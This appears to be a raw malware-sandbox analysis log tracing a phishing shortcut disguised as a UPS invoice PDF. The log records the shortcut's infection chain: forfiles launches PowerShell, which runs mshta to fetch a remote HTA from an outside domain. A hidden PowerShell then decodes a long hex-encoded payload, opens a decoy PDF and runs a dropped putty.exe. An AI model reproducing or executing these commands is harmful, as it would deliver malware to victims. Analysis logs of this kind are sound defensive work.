Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869614412_2_00007FF678696144
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67865E3A012_2_00007FF67865E3A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E637412_2_00007FF6785E6374
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869048412_2_00007FF678690484
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785FA44012_2_00007FF6785FA440
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864659012_2_00007FF678646590
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864E54012_2_00007FF67864E540
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868E5FC12_2_00007FF67868E5FC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D85D012_2_00007FF6785D85D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785EA68012_2_00007FF6785EA680
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786B867812_2_00007FF6786B8678
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869067012_2_00007FF678690670
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E270012_2_00007FF6785E2700
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869874812_2_00007FF678698748
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67865A83012_2_00007FF67865A830
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F882D12_2_00007FF6785F882D
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67862E7D012_2_00007FF67862E7D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869085C12_2_00007FF67869085C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF678625360 appears 66 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67869B8AC appears 457 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF6785FC110 appears 48 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67861A3A0 appears 38 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67860CD00 appears 40 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF678626360 appears 62 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67869FC60 appears 60 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67864A5D0 appears 78 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF6786A2CE8 appears 33 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF678612890 appears 137 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67864BFC0 appears 36 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF67860CC30 appears 150 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Process Memory Space: powershell.exe PID: 4620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000007.00000002.1770606726.000001FB69820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .CMD;.VBpt
Source: classification engineClassification label: mal100.evad.winLNK@27/54@1/3
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678617AD0 FormatMessageA,GetLastError,12_2_00007FF678617AD0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785FAA80 CoCreateInstance,12_2_00007FF6785FAA80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DD100 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,12_2_00007FF6785DD100
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cykvzpzj.1pm.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Invoice-UPS-218931.pdf.lnk.mal.lnkReversingLabs: Detection: 21%
Source: putty.exeString found in binary or memory: config-serial-stopbits
Source: putty.exeString found in binary or memory: config-ssh-portfwd-address-family
Source: putty.exeString found in binary or memory: config-address-family
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
